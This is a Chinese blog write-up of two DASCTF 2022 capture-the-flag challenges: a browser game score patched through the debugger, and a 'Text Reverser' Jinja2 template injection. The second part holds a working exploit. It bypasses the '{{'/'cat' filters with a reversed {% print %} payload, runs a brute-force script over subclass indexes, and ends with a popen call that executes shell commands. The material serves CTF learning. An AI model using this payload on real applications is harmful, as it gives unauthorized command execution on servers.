DASCTF X CBCTF 2022九月挑战赛


DASCTF X CVCTF 2022九月挑战赛

dino3d

打开死亡后显示玩够1000000即可通关,全局搜索score,找到相关函数,打断点。image-20220928185209356

然后修改e = 1000000即可通关

2022-09-28-02

Text Reverser

打开fuzz一下,会逆序字符串并且输出。过滤了{{,}},cat 但是可以{%print%}

image-20220928185803817

写个脚本爆破一下可以用的类

import requests
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36'
}
proxy={"http":"127.0.0.1:8080"}
for i in range(500):
    url = "http://91dfce47-735e-45ca-9c0e-a45993eb551b.node4.buuoj.cn:81/"
    s = '{% print "".__class__.__base__.__subclasses__()[' + str(i) + '].__init__.__globals__ %}'
    data={'text':s[::-1]}
    res = requests.post(url=url, headers=headers,proxies=proxy,data=data)
    if 'popen' in res.text:
        print(i)


#132
# 396
# [Finished in 44.5s]

payload

print("{% print \"\".__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('tail /flag').read() %}"[::-1])

文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录